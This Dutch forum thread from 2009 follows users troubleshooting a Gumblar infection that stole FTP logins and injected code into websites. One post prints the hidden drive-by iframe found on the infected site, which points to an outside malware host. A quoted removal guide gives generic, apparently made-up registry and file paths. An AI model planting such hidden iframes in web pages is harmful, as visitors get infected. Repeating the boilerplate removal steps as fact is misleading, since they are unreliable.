Het Gumblar virus, hoe kom ik er vanaf?!

quote:

Op maandag 10 augustus 2009 13:59 schreef St4ck3r het volgende:
Gumblar virus!

Veel last van hier (ISP) ff je FTP gegevens wijzigen..

quote:

Op dinsdag 11 augustus 2009 11:13 schreef MissBliss het volgende:
Format? Neeeeeeeeeeeeeeeeeeeee!

quote:

Firstly, find another computer that is not infected. Go to your host’s control panel and change the password. If you are running a database driven site, change your database user passwords too. Backup your database – it is not clear at the moment if the database is at risk. Then, the safest option, is to delete everything in your public_html directory (or equivalent) plus html files in the tmp/webalizer and tmp/awstats directories. Ok, you lose you stats, this is not the end of the world though.

On your computer install Avast. Update Windows. If you struggle to get to the website, that’s the virus blocking you. Download from another pc, copy to media, then install from there. Update and run, run in safe mode, clear you temp data (CCleaner has always been handy for this) and run it again. Make sure you pc is clear. Reboot and run again (in case pesky virus hides and returns on reboot). Ah, before doing all that, disable Windows Restore and ensure all restore points are trashed (should be automatic).

When you computer is clear, you should be ok. As a precaution, delete all FTP passwords from all applications (even the ones you forgot about/tested years ago). I suggest that web masters stop saving FTP data on their pc’s completely. Better safe than very very sorry. Remember, Dreamweaver, Link Crawlers and Site Map generators, Photo Editors, Album Creaters and even some notepad tools (like PSPad) store FTP information.

quote:

To remove Gumblar, you must first stop any Gumblar processes that are running in your computer's memory. To stop all Gumblar processes, press CTRL+ALT+DELETE to open the Windows Task Manager. Click on the "Processes" tab, search for Gumblar, then right-click it and select "End Process" key.

To delete Gumblar registry keys, open the Windows Registry Editor by clicking on the Windows "Start" button and selecting "Run." Type "regedit" into the box and click "OK." Once the Registry Editor is open, search for the registry key "HKEY_LOCAL_MACHINE\Software\Gumblar." Right-click this registry key and select "Delete."

Finally, to completely get rid of Gumblar, you must manually remove other Gumblar files. These Gumblar files can be in the form of EXE, DLL, LSP, TOOLBAR, BROWSER HIJACK, and/or BROWSER PLUGIN. For example, Gumblar might create a file like
%PROGRAM_FILES%\Gumblar\Gumblar.exe. Locate and remove these files.

quote:

Op dinsdag 11 augustus 2009 11:41 schreef MissBliss het volgende:
Avast heeft vannacht gescand, maar hij is (weer ) vastgelopen, nu scant ie weer, maar hij is pas op 58%.
Ik probeer dat McAfee ook wel!

Ja, we hebben idd een netwerk Yay.
[..]

Oh dit wordt een dagtaak

quote:

Op dinsdag 11 augustus 2009 11:46 schreef MissBliss het volgende:

[..]

Ja, dat ga ik zo maar doen.

Naja, Re heeft 1 vd laptops mee naar zn werk Ik zal hem even bellen
Gebeld: hij is ook geinfecteerd

quote:

Op dinsdag 11 augustus 2009 12:02 schreef St4ck3r het volgende:
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>

Ze wisselen wel mooi af met linkjes

quote:

Op dinsdag 11 augustus 2009 12:10 schreef MissBliss het volgende:

[..]

Dat heb ik al gezegd ja.
[..]

Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was

quote:

Op dinsdag 11 augustus 2009 12:03 schreef Qwea het volgende:

[..]

ja hier waren er ook 2 verchillende. 1 naar .ru en 1 naar .in . En het waren totaal andere linkjes.

Ik vraag me af, hoe dit concreet opgelost gaat worden.

Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...

Ga je dat ooit stoppen?

quote:

Op dinsdag 11 augustus 2009 12:20 schreef Re het volgende:

[..]

call gelogd bij helpdesk, responsetijd 3 uur , dus ik merk het wel

quote:

Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:

[..]

Het is mn eigen computer ja. Ik durf dit niet

Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft

quote:

Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:

[..]

Het is mn eigen computer ja. Ik durf dit niet

Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft

quote:

Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:

[..]

Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

Weer een reden om over te stappen op Apple

quote:

Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:

[..]

Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

Weer een reden om over te stappen op Apple

quote:

Wat doet Gumblar?
Het doel van de malware is om zoveel mogelijk computers te besmetten en gevoelige informatie van de deze computers te stelen. Gumblar gaat na infectie van een computer op zoek naar zogenaamde FTP-inloggegevens. FTP wordt vaak gebruikt om websites te updaten. Deze gegevens worden door Gumblar gebruikt om toegang te krijgen tot de content van allerlei (goed bedoelde) websites. Webpagina's van deze sites worden vervolgens aangepast. Bezoek je zo’n site, dan krijg je deze nieuwe malware aangeboden. Dit gebeurt opnieuw via de kwetsbare plekken in Adobe PDF Reader en Adobe Flash wanneer je zo'n website bezoekt. Op deze manier worden computers geïnfecteerd met de Gumblar code.

Ook worden er aanpassingen gedaan in Internet Explorer, de webbrowser. Deze aanpassingen zorgen ervoor dat zoekresultaten in Google worden gemanipuleerd en verwijzen naar sites waarmee malware verspreid wordt.

Naast het manipuleren van Google-zoekresultaten en het stelen van FTP-inloggegevens zal een besmette computer:

quote:

Affected Platforms:

The malware affecting PCs targets prevalent Microsoft platforms:

* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server 2003

quote:

Op dinsdag 11 augustus 2009 12:26 schreef MissBliss het volgende:

[..]

Nee, dan blijf ik er vanaf!

Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.

quote:

Op dinsdag 11 augustus 2009 12:32 schreef MissBliss het volgende:
Ok, ook niet meer googlen in IE dus

Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw

quote:

Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem

quote:

Op dinsdag 11 augustus 2009 12:35 schreef MissBliss het volgende:

[..]

Ok.

quote:

Op dinsdag 11 augustus 2009 12:37 schreef MissBliss het volgende:

[..]

Ja, goed idee!
Zal ik het zelf doen?

quote:

Op dinsdag 11 augustus 2009 12:43 schreef MissBliss het volgende:
Volgens mij tot nu toe nog niks

quote:

Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem

quote:

Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:

[..]

Het is mn eigen computer ja. Ik durf dit niet

Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft

quote:

Op dinsdag 11 augustus 2009 12:47 schreef Re het volgende:
homepage is iig veranderd naar goolge

ik krijg allemaal genereic FakeAlert.d!gen waarschuwingen, verder is er nog een sys.exe geinfecteerd waar de virusscan hier op kapotgaat:')

quote:

Op dinsdag 11 augustus 2009 12:49 schreef MissBliss het volgende:

[..]

Oh

quote:

Op dinsdag 11 augustus 2009 13:09 schreef Mr.Noodle het volgende:
Als ze gewoon even in heel het netwerk even Malwarebytes anti-malware installeren om het te detecteren en te verwijderen. Proces kan alleen wel enige uren duren als het voor meerdere machines geldt.

aVast doet hier trouwens niet veel tegen..

quote:

Op dinsdag 11 augustus 2009 13:11 schreef CantFazeMe het volgende:
Malwarebytes werkt alleen als er een virus/trojan actief is het is geen actieve scanner. (Het kan wel, maar dan moet je ervoor betalen.)

Maar het is een zeer goed programma.

quote:

Op dinsdag 11 augustus 2009 13:13 schreef Qwea het volgende:

[..]

Die is toch ook actief

quote:

Op dinsdag 11 augustus 2009 13:15 schreef CantFazeMe het volgende:

[..]

Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis.

quote:

Op dinsdag 11 augustus 2009 12:35 schreef Qwea het volgende:

[..]

Download ff avast. Ik snap het niet he...

Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaan terwijl hier gelijk mijn pc ging lopen schreeuwen " BAD IFRAME! VIRUS! TROJAN!"

quote:

Op dinsdag 11 augustus 2009 13:11 schreef Qwea het volgende:

[..]

Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless.

quote:

Op dinsdag 11 augustus 2009 13:17 schreef MissBliss het volgende:
Avast is klaar, niks gevonden
(Alleen 3 foto's die niet te scannen zijn, die zijn ook niet te verwijderen, heel raar, maar dat is al langer dus zal hier wel niks mee te maken hebben.

Nu ga ik dat malwarebytes eens proberen.

quote:

Op dinsdag 11 augustus 2009 13:19 schreef Mr.Noodle het volgende:

[..]

aVast doet half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig.

quote:

Op dinsdag 11 augustus 2009 13:17 schreef Qwea het volgende:

[..]

Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.

Voor gewone bescherming draait ze op dr eigen pc avast.

Wat draai je eigenlijk op die andere machines MB?

quote:

Op dinsdag 11 augustus 2009 13:19 schreef Litso het volgende:

[..]

Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelicht

quote:

Op dinsdag 11 augustus 2009 13:21 schreef CantFazeMe het volgende:

[..]



Dat bedoel ik dus. (lets go back ontopic.)

quote:

Op dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
Even opnieuw opstarten, de J schijf is verdwenen

Hoe moet ik het netwerk scannen dan? De gedeelde schijven?

quote:

Op dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
Even opnieuw opstarten, de J schijf is verdwenen

Hoe moet ik het netwerk scannen dan? De gedeelde schijven?

quote:

Op dinsdag 11 augustus 2009 12:30 schreef Qwea het volgende:

[..]


[..]

Flash en adobe reader.
[..]


[..]

Ik vraag me af waarom vista niet.

overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten

Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen?

Wat is het leven toch heerlijk met een Mac .

quote:

Op dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:

[..]

Ok maar begrijp ik hieruit dat:

Je besmet bent.
Je de virus weghaald.
Je website vernieuwd
Je alsnog nog een keer besmet kan raken omdat je een website hebt bezocht die alsnog besmet is?


Wat is het leven toch heerlijk met een Mac .

quote:

Op dinsdag 11 augustus 2009 13:03 schreef Qwea het volgende:

[..]

! En die helpdesk is nog steeds niet langs geweest?

Ik hoop stiekem dat je slim bent geweest en je laptop uit het netwerk hebt getrokken?

quote:

Op dinsdag 11 augustus 2009 13:35 schreef Mr.Noodle het volgende:
Norton en Mcafee zijn ook logge verouderde rukprogramma's die gewoon niet voorbereid zijn op de nieuwere soorten virussen en dus hard achterlopen, maar dit was al een jaartje of 8 zo.

quote:

Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
Maar die moet dan toch gebruik maken van een enorm gat in je browser?

quote:

Op dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:

[..]

Wat is het leven toch heerlijk met een Mac .

quote:

Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
Maar die moet dan toch gebruik maken van een enorm gat in je browser?

quote:

Op dinsdag 11 augustus 2009 13:39 schreef Mr.Noodle het volgende:

[..]

Via de Adobe plugins waarvan je browser gebruik maken..

quote:

Nieuwe kampioen

Volgens ScanSafe is Gumblar erger dan Conficker, een worm die zich verspreidt via een gat in Windows, om vervolgens namaak antivirussoftware te installeren en de echte uit te schakelen. Gumblar was de eerste twee weken van deze maand goed voor veertig procent van de malware die werd geblokkeerd door ScanSafe.

De worm gedraagt zich anders dan Conficker, hij dringt dieper binnen en onderschept en monitort het webverkeer. Daarnaast wordt er een Trojaans paard geïnstalleerd dat data zoals wachtwoorden en gebruikersnamen steelt, aldus Cnet.

quote:

Op dinsdag 11 augustus 2009 13:41 schreef MissBliss het volgende:

[..]

Ok
Ja goed idee wel

Oh, minilaptop heeft geen cd-romstation, kijken of het op een usb-stick past
[..]

Ja?
Ik durf er niet meer te kijken

quote:

Op dinsdag 11 augustus 2009 13:42 schreef Mr.Noodle het volgende:
Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren omdat mensen niet normaal aan het werk kunnen..

_sorry..

quote:

Op dinsdag 11 augustus 2009 13:44 schreef MissBliss het volgende:

[..]

Ik vind het ook zeer hilarisch.

quote:

Op dinsdag 11 augustus 2009 13:44 schreef MissBliss het volgende:

[..]

Oh dat, ja ik weet niet wat dat is, volgens mij gewoon het virus?

quote:

Op dinsdag 11 augustus 2009 13:47 schreef MissBliss het volgende:

[..]

Het stickje? Ja, die zal ik ook scannen

quote:

Op dinsdag 11 augustus 2009 13:47 schreef MissBliss het volgende:

[..]

Het stickje? Ja, die zal ik ook scannen

quote:

Op dinsdag 11 augustus 2009 13:48 schreef Litso het volgende:
Wat een gruwelijk gebruiksonvriendelijk is Avast eigenlijk zeg.

quote:

Op dinsdag 11 augustus 2009 13:50 schreef MissBliss het volgende:

[..]

Nu wel

iPhone ook maar?
Oh nee, das van Apple

quote:

Op dinsdag 11 augustus 2009 13:51 schreef Qwea het volgende:

[..]

vind je???

Ik vind het echt een ideale scanner

quote:

Op dinsdag 11 augustus 2009 13:55 schreef Litso het volgende:

[..]

Er staat nergens tekst, alleen een oerlelijk metallic design met een paar knoppen die niet voor zich spreken. Ik moet elke keer met mijn muis over de knoppen hoveren om te zien wat ze eigenlijk doen.
Verder past er amper tekst in het schermpje waardoor er vanalles wordt afgekort, en kan ik nergens zien of en hoeveel bedreigingen er eigenlijk al zijn gevonden. En een 'settings' ofzo is er ook niet.

quote:

Op dinsdag 11 augustus 2009 13:58 schreef Qwea het volgende:

[..]

Hehehe.. in je taakbalk, naast je klok staat een mooi avast rondje, rechtermuisknop en dan programma instellingen

Daar heb je instellingen die je kan aanpassen

quote:

Op dinsdag 11 augustus 2009 14:04 schreef Litso het volgende:
Nou, avast vindt ook niks dus het zal meevallen

quote:

Op dinsdag 11 augustus 2009 14:02 schreef Re het volgende:

[..]

de virusscan display is gewoon een beetje ruk vind ik ook wel eigenlijk...

quote:

Op dinsdag 11 augustus 2009 13:47 schreef amvrosios het volgende:
Formateren die zooi,je blijft toch altijd met rotzooi zitten,
Damn,wat ben ik blij dat er ook gwn linux bestaat!

quote:

Op dinsdag 11 augustus 2009 13:45 schreef Qwea het volgende:

[..]

Nou, erg veel tijd. Het bedrijf waar mijn vriend werkt heeft het dus ook. En die hebben dus echt veel ftp gegevens van klanten e.d. En ik geloof dat de halve afdeling nu met dat virus bezig is

Ik vind het werkelijk een KUT vrius

quote:

Op dinsdag 11 augustus 2009 14:14 schreef CasB het volgende:

[..]

Idd, ik ben blij dat ik lekker Ubuntu draai en geen gezeik heb met dit soort rare onzin.

quote:

Het computer virus probleem is veel minder voorkomend op het UNIX platform, maar dat betekent niet dat het niet bestaat. UNIX virussen (hoewel erg weinig) bestaan wel degelijk. Toegevoegend, sommige van de oudste worms zijn gebaseerd op UNIX! Als je je data belangrijk vind, dan zal je deze feiten moeten accepteren.
(Noem één Linux vrius? Okay... Bliss.)

Dit gezegd te hebben, er zijn zeker (en niet verrassend) erg weinig virussen in het wild levensvatbaar op UNIX. Dit komt gedeeltelijk door toegangsrestricties in de werkomgeving. Bijvoorbeeld, als een gebruiker een geïnfecteerd bestand gebruikt, kan het alleen doen wat de gebruiker aan privileges heeft (onder normale omstandigheden-niet veel) dus op z'n minst zal het niet verspreid worden naar andere systemen. Maar als een supergebruiker (of iemand zonder enige restricties) een virus opent, kan het mogelijk het gehele system infecteren en doorgestuurd worden naar andere systemen... etc.

Ook moeten we onthouden, dat virussen onder UNIX besturingssystemen veel minder voorkomen simpel omdat dit besturingssyteem lang niet zo wijd verspreid is als DOS/Windows besturingssytemen voor thuisgebruikers. Als er meer mensen thuis gebruik zullen maken van UNIX, zullen er meer virussen hun weg zoeken. De opkomst van het GNU/Linux besturingssysteem heeft dit zeker aangetoond.

Wees gewaarschuwd, als UNIX-achtige systemen zoals GNU/Linux populairder worden en makkelijker voor thuisgebruik, zullen meer en meer onervaren gebruikers hun systeem laten opereren met volledige toegangsrechten voor allen en op die manier malware een makkelijke manier geven om hun systeem te verstoren.

quote:

Op dinsdag 11 augustus 2009 14:18 schreef Walter_Sobchak het volgende:

[..]

Dit al geprobeerd?

quote:

Op dinsdag 11 augustus 2009 14:20 schreef Qwea het volgende:

[..]

Komen al die linux goeroes weer
[..]

quote:

Op dinsdag 11 augustus 2009 14:20 schreef Qwea het volgende:

[..]

Flikker op met je mac. Er staat er hier 1. Ik blijf mooi op windows.

Trouwens, zet jullie semi geile kwijlsessies op linux en apple eens elders voort gaarne.

quote:

Op dinsdag 11 augustus 2009 14:28 schreef Walter_Sobchak het volgende:

[..]

Ben je mal? Ik vermaak me hier prima. Ik krijg er altijd

dit

gevoel bij.

quote:

Op dinsdag 11 augustus 2009 14:27 schreef CasB het volgende:

[..]

Ik kan er ook niks aan doen dat de beveiliging van Windows zo slecht is. Ik heb zelf ook wel eens last gehad van malware in Windows, en het is te belachelijk voor woorden dat de enige oplossing is dat je je pc moet formatteren.

Maar dat terzijde.

Via wat voor flash/adobe programma ben je er dan eigenlijk aangekomen? Kan dat al als je op een site komt met dat iframe?

quote:

Op dinsdag 11 augustus 2009 14:31 schreef Qwea het volgende:

[..]

Via adobe flash en reader. Geen idee hoe het precies werkt, ik heb nog geen last van het kreng gehad

En formatten is IMHO ook wel erg rigoreus. Als ik een virus niet "normaal" weg krijg dan ga ik in het register spitten

quote:

Op dinsdag 11 augustus 2009 14:50 schreef Mr.Noodle het volgende:

[..]

Meeste mensen snappen van dat in het register spitten ook geen drol. Dus als dat niet lukt, dan blijft echt alleen formatteren over. Het scheelt in ieder geval een hoop tijd aan uitzoeken. Maar goed, we kijken eerst maar wat Malwarebytes oplevert.

quote:

Op dinsdag 11 augustus 2009 15:08 schreef Noork het volgende:
Damn, heb net wat spyware opgelopen op jouw site. AVG hield het vreemdgenoeg niet goed tegen.

quote:

Op dinsdag 11 augustus 2009 15:24 schreef Qwea het volgende:

[..]

Sorry hoor, maar er staat VIRUS in de OP, de link in de OP is weggehaald, en er staat een waarschuwing. En toch ga je nog klikken?

Ik krijg iig geen avast melding meer

quote:

Op dinsdag 11 augustus 2009 15:27 schreef MissBliss het volgende:
Volgens mij is Malwarebytes vastgelopen
Als ik hem maximaliseer krijg ik zo'n wit scherm

quote:

Op dinsdag 11 augustus 2009 15:31 schreef Noork het volgende:

[..]

Moet toch zien waar het over gaat En ik verwijt niemand, geef het alleen maar aan. Meestal val ik met Opera als browser en AVG buiten schot bij dit soort virussen...

quote:

Op dinsdag 11 augustus 2009 15:32 schreef Qwea het volgende:

[..]

Ik vind het alleen een beetje dom van je Maar goed

Ga maar malware draaien !

quote:

Op dinsdag 11 augustus 2009 15:37 schreef MissBliss het volgende:

[..]

Dat staat er niet meer in Er staat zelfs een waarschuwing!

Ik zal hem wel even uit mn sig halen ook.

quote:

Op dinsdag 11 augustus 2009 15:41 schreef Qwea het volgende:
tof!

ik heb hem ook ?

quote:

Op dinsdag 11 augustus 2009 15:42 schreef CantFazeMe het volgende:

[..]

O really?

quote:

Op dinsdag 11 augustus 2009 15:46 schreef Qwea het volgende:
elke x dat ik ga googlen flipt avast nu

quote:

Op dinsdag 11 augustus 2009 15:49 schreef CantFazeMe het volgende:

[..]

quote:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 15:52:04, on 11-8-2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v8.00 (8.00.6001.18813)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Samsung\EBM\EasyBatteryMgr3.exe
C:\Program Files\Samsung\Samsung Magic Doctor\MagicDoctorKbdHk.exe
C:\Program Files\SAMSUNG\EasySpeedUpManager\EasySpeedUpManager.exe
C:\Program Files\Samsung\Easy Display Manager\dmhkcore.exe
C:\Program Files\Samsung\Samsung Update Plus\SUPBackground.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\system32\igfxext.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Alwil Software\Avast4\ashSimpl.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O13 - Gopher Prefix:
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe

--
End of file - 3746 bytes

quote:

Op dinsdag 11 augustus 2009 15:50 schreef Qwea het volgende:

[..]

echt

quote:

Op dinsdag 11 augustus 2009 15:49 schreef Qwea het volgende:
Het bestand in file:///C:/Users/Qwea/AppData/Roaming/Mozilla/Firefox/Profiles/zgodd7xy.default/

en dan die formhistory kan ook gewoon niet verwijderd worden ennu zittie ook in places ik had godverdomme net mn laptop gekocht en geconfigged donderdag!

quote:

Op dinsdag 11 augustus 2009 15:53 schreef Swetsenegger het volgende:

[..]

Nou dan heb je nog weinig spannende data. Formateren maar.

quote:

Op dinsdag 11 augustus 2009 15:53 schreef CantFazeMe het volgende:

[..]

Ik geloof je wel hoor.

Verwijder hem maar snel.

quote:

Op dinsdag 11 augustus 2009 15:53 schreef MissBliss het volgende:
Je hebt toch Vista? Daar kon het toch juist niet op komen?

quote:

Op dinsdag 11 augustus 2009 15:55 schreef Qwea het volgende:

[..]

als jij mn hijackthis log wil checken?

quote:

Op dinsdag 11 augustus 2009 15:59 schreef CantFazeMe het volgende:

[..]

't ziet er goed uit juist. Hardnekkig die Gumblar. Kan je ook Malwarebytes erop los laten?

O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file) <<< Fix checked

oobefldr.dll <<< Onderdeel van Vista? Denk t wel.
http://www.google.nl/search?hl=nl&q=oobefldr.dll&btnG=Zoeken&meta=lr%3Dlang_nl

quote:

Op dinsdag 11 augustus 2009 16:01 schreef Qwea het volgende:

[..]

Malware is al bezig. Hijack was eerder klaar

Windows errors related to oobefldr.dll?

oobefldr.dll is a process belonging to the Microsoft® Windows® Operating System program . "oobefldr.dll is a Welcome Center Component" "from Microsoft Corporation" "belonging to Microsoft® Windows® Operating System"

ik hoef dus niks te verwijderen en kan hem (hijackthis) afsluiten?

quote:

Op dinsdag 11 augustus 2009 16:04 schreef CantFazeMe het volgende:

[..]

Nee niet echt, die (no file) kun je eventueel verwijderen, maar de rest niet. Die no file doet niks zeg maar
Ok. Laat die dll maar staan idd.

quote:

Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft

quote:

Op dinsdag 11 augustus 2009 15:24 schreef Qwea het volgende:

[..]

Nou ja, tijd aan uitzoeken? Weet je hoe omslachtig formatten is? Je kan alle partities gaan formatten. Dus je moet een back up maken, windows opnieuw installen, ect

Je laat het een beetje klinken alsof formatten binnen een half u gepiept is wast maar zo simpel

quote:

Op dinsdag 11 augustus 2009 16:09 schreef Mr.Noodle het volgende:

[..]

Als je meerdere partities hebt is het alleen maar makkelijker. Je kan de virusscanner en malwarescanner er op los laten. Maar daar zul je weinig kwaadaardigs vinden. Zeker omdat er op andere partities niet het besturingssysteem staat. Enige wat geinfecteerd wordt is de partitie met Windows erop. Daar staat het register in en daar worden alle taken van programma's uitgevoerd.

quote:

Op dinsdag 11 augustus 2009 16:08 schreef MissBliss het volgende:

[..]

Ik snap niet wat je precies typt, maar ik gebruik dus ook filezilla en het ergerde me juist zo dat ie mn inloggegevens nooit onthield Maar dat doet ie dus kennelijk wél

quote:

Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft

quote:

Op dinsdag 11 augustus 2009 16:14 schreef MissBliss het volgende:

[..]

Ok. Kan je daar nog iets aan doen? Of is dat gewoon een minpunt van Filezilla?

quote:

Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft

quote:

Op dinsdag 11 augustus 2009 16:17 schreef MissBliss het volgende:

[..]

Ik heb zo lang gezocht naar een handig ftp-prog

Nee, ik heb even tussendoor een ander programma laten draaien, superantispyware, die heeft inmiddels al 96 threats gevonden Daarna doe ik mailwaren-dinges wel weer.

quote:

Op dinsdag 11 augustus 2009 16:30 schreef Mr.Noodle het volgende:
Wat zei ik nou net over aVast...

quote:

